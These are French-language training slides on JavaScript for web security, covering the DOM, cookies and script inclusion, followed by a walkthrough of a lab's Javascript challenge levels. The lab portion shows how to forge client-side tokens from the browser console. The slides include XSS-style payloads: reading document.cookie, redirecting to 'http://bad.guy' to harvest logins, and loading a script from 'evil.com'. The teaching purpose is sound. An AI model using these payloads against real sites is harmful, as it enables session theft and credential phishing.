# javascript

## aka ECMAScript


## Javascript

* 95 netscape livescript
* interpréteur js propre au navigateur
  * ie s'arrête de charger la page en cas d'erreur
  * ff ou chrome essaient de continuer l'exécution
* sensible à la casse
* asynchrone


## scope

* `var variable`
  * directement dans le script
    * accessible partout y compris dans les fonctions
  * dans les fonctions
    * visibilité restreinte à la fonction

* sans `var` visibilité globale

Note:
- on peut avoir du js dans un pdf (adobe reader a donc un interpréteur js)
- Google a mis le pied sur l'accélérateur avec la sortie de chrome
    - ca ve de mieuix en mieux en terme de comatibilité cross browser


## Les événements

* sur chaque élément

  * chaque balise
  * page

* système d'événement
    * orienté interaction utilisateur


## Les événements

* onload
  * quand tous les éléments sont chargés
    * il est alors possible de modifier les contenus

* onunload
  * quand on quitte le navigateur
    * abandonner car trop intrusif


## Les événements

* onerror
  * en cas d'échec
    * chargement d'image ou d'iframe par exemple

* onsubmit
  * quand un formulaire est soumis
    * changer l'url d'un formulaire à la volée


## Le DOM

[<i class="fa fa-book" aria-hidden="true"></i> document](https://developer.mozilla.org/en-US/docs/Web/API/Document)

* Document Object Model
    * document.referer (SEO)
* id unique getElementById
    * renvoie un résultat
* getElementsByTagname
    * renvoie un tableau d'elements
    * la page en cours est le contexte
        * history.back() c'est un autre contexte
        * frame ...


## Le DOM

* document.cookie
    * values = document.cookie.split(';')
    * "userid=maze;expires=friday 29 sept"
* souvent utilisé pour exploiter les XSS
    * changer le contenu de la page
    * rediriger la page
    * changer l'url d'un formulaire


## vrac

[<i class="fa fa-book" aria-hidden="true"></i> window](https://developer.mozilla.org/en-US/docs/Web/API/Window) représente l'environement du navigateurs

```js
window.alert('PoC')
// affiche PoC en pop up
```

```js
console.log('plus silencieux')
// affiche "plus silencieux"
// dans la console (F12)
```

```js
alert(document.cookie); 
// affiche le contenu du 
// cookie de session en pop up
```

```js
window.location = "http://bad.guy"; 
// redirige vers http://bad.guy
```

Note:
- redirection sur une  page identique
    - maitrisée par nous qui renvoie au serveur oriignal après avoir récup le login / mot de passe


## inclusion

dans le corps de la page

```js
<script>alert('Poc');</script>
```

dans un fichier externe

```js
<script src="http://evil.com/payload.js"></script>
```

directement dans les événements associés à un élément du DOM

```js
<a onclick="javascipt:alert('clicked');">peacefull link</a>
<img onload="javascript:console.log('quieter');" />
```


## AJAX / XMLHTTPRequest

* associé au web 2.0 (2006)
* existe depuis le début HTTP 1.0 (1989)
  * google map éléments de la carte chargés et rafraichis au déplacement
* permet un appel asynchrone d'url
  * sans recharger la page
  * le résultat reçu est utilisable par js
    * json

[<i class="fab fa-github"></i> un gist exemple](https://gist.github.com/nealrs/28dbfe2c74dfdde26a30)


<i class="fa fa-book"></i> Apprendre JS

* https://developer.mozilla.org/fr/docs/Web/JavaScript
  * https://www.youtube.com/watch?v=jnbiNr9b_lk
* https://devdocs.io/javascript/

<i class="fa fa-book"></i> Faire du JS en 2023

* https://www.typescriptlang.org/
* https://nodejs.org/
* https://fr.reactjs.org/
* https://vuejs.org/


### <i class="fa-solid fa-bomb"></i> Javascript / Low

* analyse de la requête / formulaire
  * champs hidden `token`
    * https://beautifier.io
      ```
      token = md5(rot13(phrase))
      ```

* forcer 
  ```
  token = md5(rot13("success"))
  ```
  * via la console / explorer du navigateur (F12)


### <i class="fa-solid fa-bomb"></i> Javascript / Medium

* analyse de la requête / formulaire
  * champs hidden `token`
    ```
    "XX" + reverse("ChangeMe") + "XX"
    ```

* forcer 
  ```
  token = "XXsseccusXX"
  ```
  * via la console / explorer du navigateur (F12)


### <i class="fa-solid fa-bomb"></i> Javascript / High

* analyse de la requête / formulaire
  * champs hidden `token`
    * interception de la requête avec `burpsuite`
      * la valeur soumise n'est pas celle du champs original
* le code js est incompréhensible
  * <i class="fa-solid fa-screwdriver-wrench"></i> [http://deobfuscatejavascript.com](http://deobfuscatejavascript.com/#)


### <i class="fa-solid fa-bomb"></i> Javascript / High

1. 
  ```js
  document
    .getElementById("phrase")
    .value = "";
  ```
2. 
  ```js
  token_part_1("ABCD", 44);
  ```
  * 
    ```js
    do_something(phrase);
    ```
    * inverse la phrase 
      * mais elle est vide


### <i class="fa-solid fa-bomb"></i> Javascript / High

3. `token_part_2("XX")` est exécutée après 300ms 
  ```js
  document
    .getElementById("token")
    .value = sha256(
      "XX" 
      + document
          .getElementById("phrase")
          .value
    )
  ```
    * c'est bien la valeur du token pour une phrase vide


### <i class="fa-solid fa-bomb"></i> Javascript / High

4. La soumission du formulaire déclenche `token_part_3("ZZ")`
  * le paramètre `t` n'est pas utilisé
    * le jeton envoyé dans la requête est 

```js
sha256(document.getElementById("token").value + "ZZ")
```
```js
sha256(
  sha256("XX" + document.getElementById("phrase").value) 
  + "ZZ"
)
```


### <i class="fa-solid fa-bomb"></i> Javascript / High

* considérant qu'en `2` la phrase a été inversée

```js
token = sha256(sha256("XX" + "sseccus") + "ZZ")
//ec7ef8687050b6fe803867ea696734c67b541dfafb286a0b1239f42ac5b0aa84
```
  
  * mais `token_part_3` est toujours appelé à la soumission du formulaire
    * il faut forcer token avec 
    
```js
sha256("XX" + "sseccus")
//7f1bfaaf829f785ba5801d5bf68c1ecaf95ce04545462c8b8f311dfc9014068a
```
        
et bien mettre la phrase à `success`